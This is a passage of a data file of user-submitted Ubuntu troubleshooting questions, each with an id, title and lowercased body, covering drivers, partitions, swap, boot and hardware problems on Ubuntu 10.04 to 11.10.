monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
91275	is it possible to enable pci usb controller from grub2 console ?	i 'm trying to boot ubuntu liveusb on epox ep-4bdae motherboard ( it 's 10 years old ) . it has `` usb-* '' options in bios boot setup , but it has never recognized any of my flash drives . now it has usb-2.0 pci controller and i 've seen setpci command in grub2 console . it still did n't recognize anything plugged in ( there is only hd0 in auto-completion list ) : nor nokia n900 in `` mass storage '' mode neither transcend hdd ts500gsj25m . can i somehow somehow start this pci with grub 's setpci ?
91278	need suggestion for working xubuntu theme	i just installed xubuntu . everything works fine except the window manager theme is broken ( the border is only 1 px wide which makes it almost impossible to resize a window with my touchpad ) . the other available themes with wider borders are all ugly as hell . i would be glad if someone could suggest a metacity theme with wider borders which fits together with the greybird gtk theme . thanks !
91280	how to check if a particular ubuntu repository is used ?	we are using our own repository for ubuntu packages , and i need a way to check if the repository is really used on each workstation . i can use apt-cache policy|grep 'our-repository-address ' , but some of my colleagues do n't like it because of `` grep '' . it looks like an unreliable hack to them ... is there other way for this check or apt-cache policy|grep 'our-repository-address ' is quite standard ?
91281	netbook running ubuntu 11.10 screen backlight never comes back after it dims	my netbook running 11.10 ubuntu goes to sleep after 10 minutes of inactivity as per settings . after the screens dims , i can not get the backlight to come back on . i can see the faint text of the screen . any clues ? thanks .
91286	how to see log to find a boot problem	i want to find the cause of a boot problem i have tried ls -ltr /var/log from antony @ antony which gives me login incorrect can someone tell me what command to use to see what has upset the boot thanks nb when trying some commands from antony @ antony then password i get login incorrect . is that right ?
91287	no root file defined ?	guys please help me on how to install ubuntu in my system.at present i am using windows 7 ultimate version.my configuration 80gb hdd.c/:40gb , d/:20 , e/:19gb . now i want to replace whole win7 in c drive with ubuntu os . when i am installing it , i am getting an error message saying `` no root file defined ... please correct in the partition order ... ..bla bla ... . '' so please help me on installing ubuntu ...
91288	vodafone usb modem ( zte k3770-z ) is not working	i have purchased new vodafone usb modem ( zte k3770-z ) and tried to connect it with ubuntu 11.04 . but it is not automatically detected on ubuntu . i have installed windows 7 and ubuntu 11.04 on my laptop . to detect the modem on ubuntu i did the following steps : - 1 ) connect the modem with laptop and boot the machine with windows 7 2 ) after detecting the modem on wndows , restarted the machine and enter into ubuntu . does anyone know any solution to detect the modem automatically on ubuntu ? thanks in advance .
91290	no option to install alongside windows 7	i 'm trying to install 11.10 alongside windows 7 from usb , although i 've also tried wubi , but i 'm not getting the option to install alongside windows . i 've checked the disk type in windows disk manager and it is basic . any ideas ? ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xebfb7460 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 1210155007 604872704 7 hpfs/ntfs/exfat /dev/sda3 1210155008 1241939967 15892480 7 hpfs/ntfs/exfat /dev/sda4 1241939968 1250261679 4160856 c w95 fat32 ( lba ) disk /dev/sdb : 8054 mb , 8054636032 bytes 248 heads , 62 sectors/track , 1023 cylinders , total 15731711 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cf41e device boot start end blocks id system /dev/sdb1 * 62 15729647 7864793 c w95 fat32 ( lba ) and ... ubuntu @ ubuntu : ~ $ sudo -parted -l matching defaults entries for ubuntu on this host : env_reset user ubuntu may run the following commands on this host : ( all ) nopasswd : all ( all ) nopasswd : all
91292	is my swap ( cryptswap ) partition working properly ?	i have a feeling it 's not . i 'm running ubuntu 11.10 on a toshiba satellite l305-s5944 laptop . says i have 1.8 gib of ram ( thought i had 2 ) . when i look at the resources tab in the system monitor the swap always says 0 bytes of 0 bytes . i tried reinstalling ubuntu 11.10 , but still says the same . both times i choose the encrypt home directory option during install . some times when i 'm booting it says some thing like `` could not mount cryptswap '' . tried to get a screen shot but now it 's not doing it . when i look at my hard disk in the disk utility it shows 3 partitions created during install : 248 gb ext 4 , extended 2.0 gb , and unknown 2.0 gb . as you can see on the screen shots the partition called unknown , has the partition type : linux swap ( 0x82 ) . sorry would n't let me post images . been having problems with crashes and slow downs pretty regularly . also i do n't see a hibernate option when i click on the button in the upper right corner . so does it look like my swap space is not functioning properly ? it 's my understanding that the swap space is encrypted . is this why it 's not registering in the system monitor or is that indicating a problem ? is there any way to test if the swap is functioning ? if it 's not working , how would i make it work , looks like it 's there already , just not working possibly ? the output of `` free -m '' is : total used free shared buffers cached mem : 1883 1729 154 0 21 634 -/+ buffers/cache : 1073 810 swap : 0 0 0 not sure whether it 's luks or ecryptfs . all i did was click the check mark box that says `` encrypt my home directory '' or something similar during the normal installation process . i think it 's ecryptfs cause i just checked the hidden files in my home folder and there 's a hidden folder called `` .ecryptfs '' ran blkid and the output was : /dev/sda1 : uuid= '' 92a6b5e8-695f-4d54-a389-d5dd7c7b862e '' type= '' ext4 '' /dev/sdc1 : label= '' freeagent goflex drive '' uuid= '' 04684ae3684ad2da '' type= '' ntfs '' sdc1 is my external hd . also tried gparted and in addition to the sda1 it shows a sda 2 with a file system : `` extended '' and size 1.87 gib . it also shows a parition , sda5 , nested inside sda2 , with a file system `` unknown '' and size 1.87 gib . though next to the sda5 there is a red cirle with a `` ! '' inside . when i right on it and select `` information '' it says status : not mounted and at the bottom warning : unable to detect file system ! possible reasons are : -the file system is damaged -the file system is unknown to gparted -there is no file system available ( unformatted ) -the device entry /dev/sda5 is missing . did i do something wrong during the install ? i thought when i choose erase and use the whole hard drive that ubuntu would create the swap automatically . looks like it 's there there but not working for some reason . my /etc/fstab file looks like this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=92a6b5e8-695f-4d54-a389-d5dd7c7b862e / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb5 during installation # uuid=088145ec-4c28-43e4-b3de-9f6971b08704 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 the output of sudo fdisk -l is : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001d8e9 device boot start end blocks id system /dev/sda1 * 2048 484472831 242235392 83 linux /dev/sda2 484474878 488396799 1960961 5 extended /dev/sda5 484474880 488396799 1960960 82 linux swap / solaris disk /dev/sdc : 640.1 gb , 640135028224 bytes 1 heads , 63 sectors/track , 19845455 cylinders , total 1250263727 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2bc1313e device boot start end blocks id system /dev/sdc1 63 1250258687 625129312+ 7 hpfs/ntfs/exfat i noticed that my swap in the fstab was commented out so i deleted the # to uncomment and restarted though still not working .
91296	how-to add a software to the ubuntu software-center	may somebody tell me how i can add a freeware to the ubuntu software-center ? enter link description here
91297	how can i change the os name from ubuntu to something else ?	i want that applications like system monitor and conky display the name myos instead of ubuntu 11.10 . also , i want lsb_release -a and etc . to show myos only .
91310	fresh install of lubuntu synaptic is missing the search box in the tool bar	a complete new install of lubuntu 11.10 has synaptic 0.75.2ubuntu7 . previously when using synaptic on another system there was a search box in the tool bar where a search string could be entered which would reduce the displayed packages as the string was being entered . the box is not being displayed nor do i find any setting to enable/disable it .
91311	swap partition under logical partitions container ?	i know a similar question has been made already ( http : //askubuntu.com/questions/35303/linux-swap-partition-is-in-extended-drive ) but i have a similar problem with a partition alignment warning . i installed ubuntu 10.04 on a 640 gb disk using the full-disk/auto-partitioning option . ubiquity created the following schema : dispositivo boot start end blocks id system /dev/sda1 * 1 76353 613297152 83 linux /dev/sda2 76353 77826 11832321 5 esteso partition 2 does not start on physical sector boundary . /dev/sda5 76353 77826 11832320 82 linux swap / solaris as you can see from the fdisk output , second partition ( extended ) is misaligned with the physical sector boundary . disk manager says : `` warning : the partition is misaligned by 1024 bytes . this may result in very poor performance . repartitioning is suggested '' . question 1a : why is the swap partition ( sda5 ) inside the extended one ( sda2 ) ? 1b ) is it necessary ? question 2 : removing both sda5 and sda2 , and subsequently create a new swap partition , will solve the alignment problem ? thank you . dave
91312	why is n't smtp working in thunderbird ?	good afternoon , all . i am running ubuntu 11.10 , thunderbird 8.0 . i am having trouble sending messages using smtp , via my live account . i have verified that my settings are correct , to the best of my knowledge , and pop3 is working correctly . whenever i try and send an e-mail , i see a message stating that thunderbird is connected to smtp.live.com but , after a couple of minutes , i receive the following error : 'sending of message failed . the message could not be sent because the connection to the smtp server timed out . try again or contact your network administrator . ' any ideas ?
91314	how do i add cairo dock with opengl to startup ?	probably a dumb question , i have just started using linux again , since college 5 years ago , and getting back into the swing of things . i would like to add cairo dock to my startup and just cant figure out how for some reason , thanks .
91315	how do i remove songs from the iphone app ?	i have syncronised folders with music and they show up nicely in the dashboard and on the iphone app , but when i remove a folder from syncronizing the songs are still showing up in the iphone .
91317	how to automount folder as c : in dosbox	i have had a look at the community documentation here and there does n't seem to be any information about how to `` automount '' a folder as the c : drive in dosbox . also as a bonus is it possible to automount the cd/dvd drive in the same way ?
91324	fans spin irregularly dell m4600 precision 11.10	i just installed 11.10 on a brand new dell precision m4600 laptop yesterday and i 'm noticing the fans spinning up to full speed every minute or so then dying back down within a few seconds . where should i begin to diagnose this problem ?
91328	corrupt effects in awn and gnome do after intel graphic driver upgrade	i 've upgraded my intel hd graphic driver to the 2.16.0 version , all work fine but awn and gnome pie icon effects is going like these screenshots : what should i do ? thanks . my laptop : dell 1464 , core i3 intel hd . sorry about my english
91332	grub 2 splash screen is n't showing in hidden mode until i press a key	using lucid , in the form of turnkey core . i 'm setting up grub to boot into windows by default , with an option to boot into ubuntu as a recovery mode , with a script to restore a default image to the windows partition . the idea is to have a splash screen which tells the user to hold shift for recovery options , otherwise it 'll just boot to windows . unfortunately , while i can get my splash screen to work , it does n't show up until i press a key -- does n't seem to matter which key , as arrow keys , letters , and numbers all seem to work . at that point , the splash screen shows up and displays at the top left corner -- this appears to be the grub_hidden_timeout , and the number updates every time i press a key ; otherwise , it remains static until the actual countdown has finished . ( i guess this indicates that it is also not showing the countdown , which it should be doing , as grub_hidden_timeout_quiet is set to false . ) everything functions normally from this point : if i hold shift , the menu is displayed , otherwise it boots into windows . got the menu to be hidden in multi-os mode by using # 11 here . any ideas ? clarification : my issue is that the splash screen does not appear until i press a key . i need the splash screen to show up on its own . contents of /etc/default/grub and /boot/grub/grub.cfg available here
91337	newly created ubuntu users can not access my internal hdd partitions	i have a problem with my ubuntu 11.10 , the issue is described in the following link : hard disk icon disappears after mounting after digging and digging i found the issue . it 's a problem with ext4 partition , because i 'm able to mount my ntfs partitions without any issue . here are the details . /var/log/syslog dec 29 22:06:32 ms-lenovo-g550 ntfs-3g [ 3240 ] : version 2011.4.12ar.4 external fuse 28 dec 29 22:06:32 ms-lenovo-g550 ntfs-3g [ 3240 ] : mounted /dev/sda2 ( read-write , label `` test '' , ntfs 3.1 ) dec 29 22:06:32 ms-lenovo-g550 ntfs-3g [ 3240 ] : cmdline options : rw , nosuid , nodev , uhelper=udisks , uid=1002 , gid=1002 , dmask=0077 , fmask=0177 dec 29 22:06:32 ms-lenovo-g550 ntfs-3g [ 3240 ] : mount options : rw , nosuid , nodev , uhelper=udisks , allow_other , nonempty , relatime , fsname=/dev/sda2 , blkdev , blksize=4096 , default_permissions dec 29 22:06:32 ms-lenovo-g550 ntfs-3g [ 3240 ] : global ownership and permissions enforced , configuration type 7 dec 29 22:06:38 ms-lenovo-g550 kernel : [ 45.141025 ] userif-2 : sent link up event . dec 29 22:06:38 ms-lenovo-g550 kernel : [ 401.741884 ] ext4-fs ( sda8 ) : mounted filesystem with ordered data mode . opts : ( null ) root @ ms-lenovo-g550 : ~ # mount |tail -2 /dev/sda2 on /media/test type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda8 on /media/misc_ type ext4 ( rw , nosuid , nodev , uhelper=udisks ) root @ ms-lenovo-g550 : ~ # ls -la /media/ -- - total 16 drwxr-xr-x 4 root root 4096 2011-12-29 22:15 . drwxr-xr-x 24 root root 4096 2011-12-11 22:30 .. drwx -- -- -- 17 ms ms 4096 2011-12-22 21:59 misc drwx -- -- -- 1 abc abc 4096 2011-12-29 20:31 test my question is how to mount ext4 as same as ntfs ?
91341	how to enable 3d acceleration for nvidia geforce gts 250 ?	i 'm a linux newbie and i need help please i 'm using ubuntu 11.10 , and i want to enable 3d acceleration in my system info it says the graphics card is geforce gts 250/pci/sse2 please if you can help me give me details on how to do it ... thanks
91344	why does video playback stutter after a few minutes ?	i built a new htpc about 2 months ago and installed ubuntu 11.10 x86_64 . the system records tv with mythtv . i use mythtv and boxee for playback . after 15 minutes up to 6 hours of video playback , something causes playback to drop to about 1-2 fps . ac3 passthrough audio stutters at the same rate , but pulse audio remains normal . logging out resets/fixes the issue , but the stuttering will start again after another 15 minute to 6 hours of playback ( i have n't noticed a correlation with the varying times ) . getting up a few times during a program to log out , log back in , restart the video is getting annoying . the video card is an nvidia geforce gt 520 . i 've experienced this issue with both vdpau and software decoding . connection is hdmi to a 1080p tv . i use the nvidia hdmi audio . i tried the ubuntu-x-swat ppa , but there was no change , so those lines are now commented out of my apt sources . i 've been using ubuntu for about 5 years and am generally pretty savvy , but this one 's got me stumped . ( hopefully ) relevant system data : $ dpkg -l | grep nvidia ii nvidia-common 1:0.2.35 find obsolete nvidia drivers ii nvidia-current 290.10-0ubuntu1~oneiric~xup1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current-updates 280.13-0ubuntu5 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 290.10-0ubuntu1~oneiric~xup1 tool of configuring the nvidia graphics driver ii nvidia-settings-updates 280.13-0ubuntu1 tool of configuring the nvidia graphics driver $ uname -a linux t3 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux $ dmesg | grep -i nvidia [ 65.630897 ] nvidia : module license 'nvidia ' taints kernel . [ 66.195170 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input5 [ 66.195215 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input6 [ 66.195328 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 66.195334 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 66.195427 ] nvrm : loading nvidia unix x86_64 kernel module 280.13 wed jul 27 16:53:56 pdt 2011 edit : ( summary of comments ) i started logging gpu temperature to see if there was any correlation to the stuttering . i have not found a correlation . i 've also noted that it will sometimes go into 1-2 fps stuttering mode while sitting idle for a few hours ; it stutters the next time it is used , and i must log out , log back in to clear it .
91349	is there a way to get a driver for a canon pixma mg5320 printer ?	i tried to use the driver from a an earlier mg series printer but it does not work , and so far have not found a way to get it to . any suggestions ?
91352	blank screen after ati video card installation on ubuntu 11.10 amd64	i am new to linux , and do n't have much knowledge on the os and its technical terms . i brought a new ati/amd radeon video card , and installed on the new ubuntu 11.10 amd64 system ( this is my first linux-based os ) . the pc boot up with blank screen , not completely blank , i can see a tiny small portion of the ubuntu at the upper edge of monitor screen . ubuntu appears is working fine at the background , i just ca n't see it with the nearly blank screen . i removed the new video card and connected the monitor cable to the on-board video output , and ubuntu boot-up fine with normal appearance . i would like to get some step-by-step suggestions to fix this video card issue . thanks .
91354	how do i get a irez k2 video camera working ?	i think i just need a driver , if anyone knows how i can get one . when i plug the irez k2 camera into the ( appropriate ) usb 2 port , i get nothing - no led light on the camera , no image on the monitor , no activity in the system monitoring log . for those who will give advice about video cards , please know ( see computer specs ) that vga for my computer is built into the motherboard . for your information i am using ubuntu 10.04 and here is my devise list using lsusb followed by my specifications first for the camera , then for my computer : bobs @ bobs-desktop : ~ $ lsusb bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 016 : id 04b8:012e seiko epson corp . bus 002 device 015 : id 03f0:3104 hewlett-packard deskjet 960c bus 002 device 011 : id 047d:102f kensington pilot optical pro wireless bus 002 device 009 : id 046d : c52b logitech , inc . bus 002 device 007 : id 04b4:6560 cypress semiconductor corp. cy7c65640 usb-2.0 `` tetrahub '' bus 002 device 002 : id 8087:0024 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 11aa:1518 globalmedia group , llc irez k2 bus 001 device 002 : id 8087:0024 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bobs @ bobs-desktop : ~ $ irez k2 usb 2.0 video camera specifications image sensor size : 1/3 '' ; 0.35 megapixels resolution : up to 640x480 focus distance : 5cm to â field of view : 54o colors : up to 32 bits rgb frame rate : up to 30 fps at 640x480 ( vga ) usb cable length : 2 meters manual focus auto white balance auto exposure control led indicator ( this is an older camera that is compatible with windows xp . i can get a driver supported in windows xp . so , i 'm also wondering , can wine be of any help ? ) shuttle xpc computer ( model sh67h3 ) specifications processor : intel next generation core i5 , lga1155 socket 95w max . support chipset : intel h67 memory : ddr3 1333 mhz , dual channels support up to 32 gb total ( i 'm at 16 gb ) vga : integrated in cpu audio : realtek alc888 , 7.1 channel high definition audio ethernet : realtek rtl 8111e , 10mb/s,100mb/s,1gb/s operation , support wake-on-lan function , support pxe function storage interface : ( 2 ) sata 3g , ( 2 ) sata 6g onboard connectors : ( 1 ) 4 pin fan connector ( 1 ) 3 pin fan connector ( 4 ) sata 2.0 connectors ( 1 ) atx main power ( 2*10 ) ( 1 ) atx main power ( 2*2 ) ( 2 ) 2x5 pin usb header ( 1 ) rs232 header ( 1 ) aux-in header ( 1 ) power button header ( 1 ) front audio connector ( 1 ) pcie x 16 ( 1 ) pcie x 1 since i was asked to edit my question by disconnecting my webcam , typing dmesg , then reconnecting my webcam and typing dmesg again , i did so and saw new information since first typing dmesg . that new information came mostly at the front end of the output , with two new lines right before the end as follows : [ 0.893025 ] rtc_cmos 00:05 : rtc can wake from s4 [ 0.893045 ] rtc_cmos 00:05 : rtc core : registered rtc_cmos as rtc0 [ 0.893072 ] rtc0 : alarms up to one month , y3k , 114 bytes nvram , hpet irqs [ 0.893120 ] device-mapper : uevent : version 1.0.3 [ 0.893166 ] device-mapper : ioctl : 4.15.0-ioctl ( 2009-04-01 ) initialised : dm-devel @ redhat.com [ 0.893222 ] device-mapper : multipath : version 1.1.0 loaded [ 0.893223 ] device-mapper : multipath round-robin : version 1.0.0 loaded [ 0.893276 ] eisa : probing bus 0 at eisa.0 [ 0.893300 ] eisa : detected 0 cards . [ 0.893427 ] cpuidle : using governor ladder [ 0.893509 ] cpuidle : using governor menu [ 0.893687 ] tcp cubic registered [ 0.893764 ] net : registered protocol family 10 [ 0.894103 ] net : registered protocol family 17 [ 0.894537 ] using ipi no-shortcut mode [ 0.894575 ] pm : resume from disk failed . [ 0.894580 ] registered taskstats version 1 [ 0.895025 ] magic number : 7:868:233 [ 0.895064 ] rtc_cmos 00:05 : setting system clock to 2011-12-29 14:13:34 utc ( 1325168014 ) [ 0.895065 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 0.895066 ] edd information not available . [ 1.187927 ] usb 1-1 : new high speed usb device using ehci_hcd and address 2 [ 1.209369 ] isapnp : no plug & play device found [ 1.209378 ] freeing unused kernel memory : 668k freed [ 1.209489 ] write protecting the kernel text : 4684k [ 1.209508 ] write protecting the kernel read-only data : 1844k [ 1.217876 ] udev : starting version 151 [ 1.229482 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 1.229499 ] r8169 0000:05:00.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 1.229536 ] r8169 0000:05:00.0 : setting latency timer to 64 [ 1.229541 ] r8169 0000:05:00.0 : unknown mac , using family default [ 1.229588 ] alloc irq_desc for 30 on node -1 [ 1.229589 ] alloc kstat_irqs on node -1 [ 1.229602 ] r8169 0000:05:00.0 : irq 30 for msi/msi-x [ 1.229883 ] eth0 : rtl8168b/8111b at 0xf8094000 , 80 : ee:73:20 : fb:34 , xid 0c200000 irq 30 [ 1.231506 ] ahci 0000:00:1f.2 : version 3.0 [ 1.231516 ] ahci 0000:00:1f.2 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 1.231537 ] alloc irq_desc for 31 on node -1 [ 1.231538 ] alloc kstat_irqs on node -1 [ 1.231545 ] ahci 0000:00:1f.2 : irq 31 for msi/msi-x [ 1.243977 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0xc impl sata mode [ 1.243979 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf pm led clo pio slum part ems sxs apst [ 1.243985 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 1.246080 ] ohci1394 0000:06:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1.246088 ] ohci1394 0000:06:00.0 : setting latency timer to 64 [ 1.251985 ] scsi0 : ahci [ 1.252045 ] scsi1 : ahci [ 1.252081 ] scsi2 : ahci [ 1.252116 ] scsi3 : ahci [ 1.252144 ] scsi4 : ahci [ 1.252171 ] scsi5 : ahci [ 1.252261 ] ata1 : dummy [ 1.252261 ] ata2 : dummy [ 1.252264 ] ata3 : sata max udma/133 abar m2048 @ 0xfe705000 port 0xfe705200 irq 31 [ 1.252267 ] ata4 : sata max udma/133 abar m2048 @ 0xfe705000 port 0xfe705280 irq 31 [ 1.252268 ] ata5 : dummy [ 1.252269 ] ata6 : dummy [ 1.301946 ] ohci1394 : fw-host0 : ohci-1394 1.1 ( pci ) : irq= [ 16 ] mmio= [ fe401000-fe4017ff ] max packet= [ 512 ] ir/it contexts= [ 4/4 ] [ 1.320172 ] usb 1-1 : configuration # 1 chosen from 1 choice [ 1.320273 ] hub 1-1:1.0 : usb hub found [ 1.320379 ] hub 1-1:1.0 : 6 ports detected [ 1.383889 ] usb 2-1 : new high speed usb device using ehci_hcd and address 2 [ 1.490389 ] ata4 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1.490392 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.491396 ] ata4.00 : ata-8 : st3250318as , cc38 , max udma/133 [ 1.491398 ] ata4.00 : 488397168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 1.492023 ] ata3.00 : atapi : optiarc dvd rw ad-7261s , 1.03 , max udma/100 [ 1.492588 ] ata4.00 : configured for udma/133 [ 1.493985 ] ata3.00 : configured for udma/100 [ 1.511597 ] scsi 2:0:0:0 : cd-rom optiarc dvd rw ad-7261s 1.03 pq : 0 ansi : 5 [ 1.514773 ] usb 2-1 : configuration # 1 chosen from 1 choice [ 1.514965 ] hub 2-1:1.0 : usb hub found [ 1.515113 ] hub 2-1:1.0 : 8 ports detected [ 1.516154 ] sr0 : scsi3-mmc drive : 48x/48x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.516158 ] uniform cd-rom driver revision : 3.20 [ 1.516250 ] sr 2:0:0:0 : attached scsi cd-rom sr0 [ 1.516276 ] sr 2:0:0:0 : attached scsi generic sg0 type 5 [ 1.516394 ] scsi 3:0:0:0 : direct-access ata st3250318as cc38 pq : 0 ansi : 5 [ 1.516474 ] sd 3:0:0:0 : attached scsi generic sg1 type 0 [ 1.516509 ] sd 3:0:0:0 : [ sda ] 488397168 512-byte logical blocks : ( 250 gb/232 gib ) [ 1.516620 ] sd 3:0:0:0 : [ sda ] write protect is off [ 1.516621 ] sd 3:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 1.516673 ] sd 3:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.516868 ] sda : sda1 sda2 < sda5 > [ 1.547170 ] sd 3:0:0:0 : [ sda ] attached scsi disk [ 1.764372 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode [ 1.790448 ] usb 2-1.2 : new high speed usb device using ehci_hcd and address 3 [ 1.878747 ] usb 2-1.2 : configuration # 1 chosen from 1 choice [ 1.878912 ] hub 2-1.2:1.0 : usb hub found [ 1.879036 ] hub 2-1.2:1.0 : 4 ports detected [ 2.150365 ] usb 2-1.2.1 : new low speed usb device using ehci_hcd and address 4 [ 2.248615 ] usb 2-1.2.1 : configuration # 1 chosen from 1 choice [ 2.318327 ] usb 2-1.2.2 : new full speed usb device using ehci_hcd and address 5 [ 2.366693 ] ieee1394 : host added : id : bus [ 0-00:1023 ] guid [ 001b8c000001006d ] [ 2.413743 ] usb 2-1.2.2 : configuration # 1 chosen from 1 choice [ 2.486151 ] usb 2-1.2.3 : new high speed usb device using ehci_hcd and address 6 [ 2.579210 ] usb 2-1.2.3 : configuration # 1 chosen from 1 choice [ 3.270747 ] adding 8811512k swap on /dev/sda5 . priority : -1 extents:1 across:8811512k [ 3.581372 ] udev : starting version 151 [ 4.408664 ] type=1505 audit ( 1325168018.011:2 ) : operation= '' profile_load '' pid=511 name= '' /sbin/dhclient3 '' [ 4.408670 ] type=1505 audit ( 1325168018.011:3 ) : operation= '' profile_replace '' pid=477 name= '' /sbin/dhclient3 '' [ 4.409039 ] type=1505 audit ( 1325168018.011:4 ) : operation= '' profile_load '' pid=511 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' [ 4.409049 ] type=1505 audit ( 1325168018.011:5 ) : operation= '' profile_replace '' pid=477 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' [ 4.409245 ] type=1505 audit ( 1325168018.011:6 ) : operation= '' profile_load '' pid=511 name= '' /usr/lib/connman/scripts/dhclient-script '' [ 4.409257 ] type=1505 audit ( 1325168018.011:7 ) : operation= '' profile_replace '' pid=477 name= '' /usr/lib/connman/scripts/dhclient-script '' [ 4.428601 ] lp : driver loaded but no devices found [ 4.786889 ] xhci_hcd 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 4.786906 ] xhci_hcd 0000:03:00.0 : setting latency timer to 64 [ 4.786910 ] xhci_hcd 0000:03:00.0 : xhci host controller [ 4.786963 ] xhci_hcd 0000:03:00.0 : new usb bus registered , assigned bus number 3 [ 4.793986 ] xhci_hcd 0000:03:00.0 : irq 17 , io mem 0xfe600000 [ 4.799179 ] usb usb3 : config 1 interface 0 altsetting 0 endpoint 0x81 has no superspeed companion descriptor [ 4.799230 ] usb usb3 : configuration # 1 chosen from 1 choice [ 4.799232 ] xhci xhci_add_endpoint called for root hub then there were several lines of identical information , until at last , this : [ 133776.908694 ] usb 1-1.2 : new high speed usb device using ehci_hcd and address 4 [ 133777.337638 ] usb 1-1.2 : configuration # 1 chosen from 1 choice bobs @ bobs-desktop : ~ $
91358	problem installing a program	a program i need to use wont install . it comes as a .deb file but when i try to install it says `` wrong architecture i386 '' . how can i get it to work . this is with ubuntu 11.10 ( dual core version ) . i did get the program to run on a version of 10.10 ( single core ) running on virtual box .
91359	100.0 % usage by audio codec hwc0d0 : realtek	i ran powertop , and it says that the realtek audio codec is using 100.0 % of the cpu . is this a problem ? i 'm running ubuntu 11.10 32-bit on intel® core™ i7 cpu m 640 @ 2.80ghz × 4 sony vaio laptop .
91361	sluggish performance on an pavilion dv2210us laptop with an nvidia geforce go 6150	i am a new linux user after installed ubuntu 11.10 on my laptop . i enjoy the new learning experience but currently experiencing a single problem - sluggishness on video performance . i believe many people already asked this question again and again , but after searching through forums , i have not been able to resolve this issue . i hope you can help me . my hardware specifications hp pavilion dv2210us entertainment pc laptop amd turion x2 64 1.6ghz nvidia geforce go 6150 ( integrated graphic chip ) 2gb ddr3 rams 667mhz i did a fresh install on a separated partition and updated everything as required by ubuntu . by default , additional drivers installed version 173 for my graphic driver , which is the most stable except that it is sluggish when watching youtube or any other videos on my backup hard drive . also , dragging/minimizing/maximizing/dragging-and-shaking just seems way too slow compared to my dual-boot windows 7 . i pray that someone benign enough to help me resolve this issue as soon as possible and i will be a happy camper ! thank you very much . here is the data generated from ubuntu 11.10 terminal with command , lspci -d10de : -vvnn pavilion dv2210us geforce go 6150 video card information
91372	how do i install an older 2.6.37 kernel version ?	i have a sony vaio p netbook and for several issues ( graphics driver , audio driver and power management ) , i want to install an older version of the linux kernel on ubuntu 11.10 ( actually its xubuntu ) that seems to be much more suitable . so i searched for ubuntu kernels and found this link which includes all versions of the linux kernel distributed by ubuntu . i am looking for a version before 2.6.38 ( to escape the known power management issue ) and of course solve my many driver problems ! i guess my best bet is 2.6.37 but there are several 2.6.37.x-x kernels ! can someone point me to the right choice ? in each folder ( for example : this one ) there are several deb packages . which packages should i install ? ( note : i have a 32-bit system ) what is the installation process ? sudo dpkg -i *.deb ? is this fine or additional steps are required ? thanks .
